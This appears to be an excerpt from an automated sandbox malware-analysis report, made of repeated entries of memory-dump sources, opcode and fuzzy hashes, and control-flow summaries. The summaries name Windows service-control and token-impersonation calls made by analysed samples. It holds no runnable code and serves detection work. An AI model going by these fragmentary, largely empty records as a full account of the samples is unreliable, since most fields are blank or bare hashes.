                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeConfigService
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3849694230-0
                                                                                                                                                                                                                                                • Opcode ID: eec680434cd26391f66dc67bd7af3d7ea623e728a669685e4e8d9415ea5e68ca
                                                                                                                                                                                                                                                • Instruction ID: 7d356157cbdbe5abd9dd0590c9a4ec2ce00a177d7912fd44eab8f94e2cb33150
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eec680434cd26391f66dc67bd7af3d7ea623e728a669685e4e8d9415ea5e68ca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8F18170918A4D4FEB68DF28D84A7F977D1FB58311F10426AEC4EC7291DA74A9818B82
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                                                                                                                • Opcode ID: 854fbae99b0c45fa18c62f703613fde1e94f20b0769851e9f3e395c066609854
                                                                                                                                                                                                                                                • Instruction ID: 3d0da71d02a92cd0b9778b20f5065de05fd0c8782894f77d24df589ef3528d16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 854fbae99b0c45fa18c62f703613fde1e94f20b0769851e9f3e395c066609854
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4917170608A4D8FEB69DF28C8597E977D1FF58310F00417AE84EC7291DB74A945CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 125 7ffbace20c34-7ffbace20c3b 126 7ffbace20c3d-7ffbace20c45 125->126 127 7ffbace20c46-7ffbace20c63 125->127 126->127 129 7ffbace20c64-7ffbace20c8d 127->129 129->129 130 7ffbace20c8f-7ffbace20ce5 129->130 133 7ffbace20d40-7ffbace20daa OpenServiceA 130->133 134 7ffbace20ce7-7ffbace20cf6 130->134 139 7ffbace20dac 133->139 140 7ffbace20db2-7ffbace20db3 133->140 134->133 135 7ffbace20cf8-7ffbace20cfb 134->135 137 7ffbace20cfd-7ffbace20d10 135->137 138 7ffbace20d35-7ffbace20d3d 135->138 141 7ffbace20d12 137->141 142 7ffbace20d14-7ffbace20d27 137->142 138->133 139->140 143 7ffbace20db5 140->143 141->142 142->142 144 7ffbace20d29-7ffbace20d31 142->144 145 7ffbace20dff-7ffbace20e01 143->145 146 7ffbace20db6-7ffbace20dde call 7ffbace20e02 143->146 144->138 146->143 149 7ffbace20de0-7ffbace20de6 146->149 150 7ffbace20ded-7ffbace20dfe 149->150 151 7ffbace20de8 149->151 150->145 151->150
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenService
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3098006287-0
                                                                                                                                                                                                                                                • Opcode ID: 5e89afcc1c1104cb5b1199825e288b6dae415f317efb01564368099cc61e6b67
                                                                                                                                                                                                                                                • Instruction ID: 1c8b7e0137f9e4d33731ed17292883f6815f6b8890e95865cd65ca90e2b63707
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e89afcc1c1104cb5b1199825e288b6dae415f317efb01564368099cc61e6b67
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF51A5B0919A4D4FEB59EF28C84A7E97BD1FB59311F10412EE84EC3292DE74E8418B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 152 7ffbace2108a-7ffbace210b3 153 7ffbace210be-7ffbace21152 FindCloseChangeNotification 152->153 154 7ffbace210b5-7ffbace210bd 152->154 158 7ffbace21154 153->158 159 7ffbace2115a-7ffbace21181 153->159 154->153 158->159
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 160 7ffbace20b51-7ffbace20bb8 163 7ffbace20bc2-7ffbace20bc7 160->163 164 7ffbace20bba-7ffbace20bbf 160->164 165 7ffbace20bd1-7ffbace20c08 OpenSCManagerW 163->165 166 7ffbace20bc9-7ffbace20bce 163->166 164->163 167 7ffbace20c10-7ffbace20c2d 165->167 168 7ffbace20c0a 165->168 166->165 168->167
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ManagerOpen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1889721586-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 169 7ffbace21a41-7ffbace21ad9 ControlService 172 7ffbace21adb 169->172 173 7ffbace21ae1-7ffbace21b09 169->173 172->173
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ControlService
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 253159669-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 174 7ffbace20108-7ffbace20114 176 7ffbace2012b-7ffbace21802 ImpersonateLoggedOnUser 174->176 177 7ffbace20116 174->177 181 7ffbace21804 176->181 182 7ffbace2180a-7ffbace21831 176->182 177->176 181->182
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.276856662.00007FFBACE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ffbace20000_aWM14.jbxd
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: <Yq$hGq$hGq$hGq$hGq$hGq
                                                                                                                                                                                                                                                • API String ID: 0-9396448
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8q
                                                                                                                                                                                                                                                • API String ID: 0-596622023
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8q
                                                                                                                                                                                                                                                • API String ID: 0-596622023
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8q
                                                                                                                                                                                                                                                • API String ID: 0-596622023
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8c[j
                                                                                                                                                                                                                                                • API String ID: 0-2858579698
                                                                                                                                                                                                                                                • Opcode ID: 72353b798d9e56a725d43d4af8c7620c488e56304ab49408f554645572eb0144
                                                                                                                                                                                                                                                • Instruction ID: 1c1326f31024f57c69c2e042d3fb435afa832255b01903a494dc99351484dc2d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72353b798d9e56a725d43d4af8c7620c488e56304ab49408f554645572eb0144
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6101DD70200704CBD320EF68E51852B77EBEFD4315B008A2CD04A4B791CF79EC0A8B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: W
                                                                                                                                                                                                                                                • API String ID: 0-655174618
                                                                                                                                                                                                                                                • Opcode ID: 830016a9d5bb2d9c809e539d06a4334a1e0cf5d7d718f99b3a57a7ef607e992c
                                                                                                                                                                                                                                                • Instruction ID: 64ee0a0355e9f072386a1c659018f96c40748144b986b101ed9bf330c433fdb1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 830016a9d5bb2d9c809e539d06a4334a1e0cf5d7d718f99b3a57a7ef607e992c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF0E931106B95CFD3109728E94579B7BFAEF51204F0444ADE746CBA52C7A568078BA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bcd26304c7aac9aae387d9afd01afd7bbd99b000c57c7393a6e93ce430bda748
                                                                                                                                                                                                                                                • Instruction ID: 10ded6ef4d44e8ba4356168f333f6b0900e5663e319725fb760c22a5b7ea5914
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcd26304c7aac9aae387d9afd01afd7bbd99b000c57c7393a6e93ce430bda748
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3581F035B00244AFCB009B79D4145AEBBF6EFD5350F24846AE849DB382DA35DD46CB92
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7401d6e2f6dd4c076cfb588d3b0debe523ea21b45b083472d4cabaabf5569083
                                                                                                                                                                                                                                                • Instruction ID: 7f996fda035226524b1dec1a0fb48546c6f76f371971105c85d04dec189e116e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7401d6e2f6dd4c076cfb588d3b0debe523ea21b45b083472d4cabaabf5569083
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB51EA34A01259EFDF14DFA5E894AADBBB2FF98711F108029E802AB360DB359D41CF50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 63349590bd2967ee95d2518b76ddf0ccce654a36da596985977c4acd356ef48d
                                                                                                                                                                                                                                                • Instruction ID: 024005c32de3ed2d1614ff4fafcd879b6e82906669c3774bc1456256428376c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63349590bd2967ee95d2518b76ddf0ccce654a36da596985977c4acd356ef48d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151C475E01208DFDB18DFB9E9549ADBBB6FF88301F20852AE819AB354DB355846CF40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f90e8b4c189e663d487616801acfcb8ea6af9e71cfd17fafafe530da68deefed
                                                                                                                                                                                                                                                • Instruction ID: 8d0e99428d913c73321da7920792c5b4256b23ea4903f1b5c0fdf582ee34bf15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f90e8b4c189e663d487616801acfcb8ea6af9e71cfd17fafafe530da68deefed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E151D734A00209DFDB24DFA5E994A9DBBB2FF88311F158558E815AB361CB35EC42CF90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8611291f05278bfef084bdc3b800134b95b5b52a5ca553b0ebbb1dab801af5d9
                                                                                                                                                                                                                                                • Instruction ID: dbfee4588565b626c48f1b10642455fd975f4ae7748d79357708a45a345f38a0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8611291f05278bfef084bdc3b800134b95b5b52a5ca553b0ebbb1dab801af5d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C51C374E01208DFDB18DFB9E9549ADBBB6FF88301F20852AE809AB354DB355846CF50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a0ee3cc47d7485fdb1ec6098bb062e5d82a2101e508a963b2c71eaa6d9104e1b
                                                                                                                                                                                                                                                • Instruction ID: 5d146dfd73a7370f328aa24e8318e609f19753a2939293939698806d7c14abb4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0ee3cc47d7485fdb1ec6098bb062e5d82a2101e508a963b2c71eaa6d9104e1b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA41E035B002498FD704DB69D8587BEBBF6EF89310F1480AAD80ADB391DB359C42CB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                • Opcode ID: 9dcc30f09256f8b41fa18a3df2fabb3a73fe6f970e3a77325c23b093ba6c6a87
                                                                                                                                                                                                                                                • Instruction ID: d1f74926b84abd3afc06ff6791a016f4d772ea67859080b69137873fe0dc4643
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dcc30f09256f8b41fa18a3df2fabb3a73fe6f970e3a77325c23b093ba6c6a87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A0126255093E48FC311E77EAC951567FE6ED42300384CEDFD09D8B563DE69A90AC3A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8c2bacb9325ac0fd4de869e29ba73b8f7c0a39bd342a54ef52c786146e278382
                                                                                                                                                                                                                                                • Instruction ID: c519f80625fe19fa61dd8abb46d67ba069dab41b3fc893136ee5bcd628e409a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c2bacb9325ac0fd4de869e29ba73b8f7c0a39bd342a54ef52c786146e278382
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C0181347093449FC701DB78D9144653FB6EF8621431484FAE9458B362DA3ADD12CB52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c3eec5ab803f71b9901d925dd3df0bafffacbfb4af9801f794039a68bd283be0
                                                                                                                                                                                                                                                • Instruction ID: c14d8374e77fcb61483476823814c186a0675aa910d3a12fb0f0403c786cc862
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3eec5ab803f71b9901d925dd3df0bafffacbfb4af9801f794039a68bd283be0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFF0303234567947DE20669E79107FAB28CDB80BB6F04007BF90EC7681DA5ADC4193D1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: aff4bef0f30118b2b7611cf799c2571494e0a173d8ce4cbeb11d5313357f51ce
                                                                                                                                                                                                                                                • Instruction ID: 830f554145f561e2831378da7a22549172030a99beef005bfb2af1d3e85e41ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aff4bef0f30118b2b7611cf799c2571494e0a173d8ce4cbeb11d5313357f51ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F0AF347493848FC7019778A9280693FB6EB8625175885FAD549CB3D7D9399D02C782
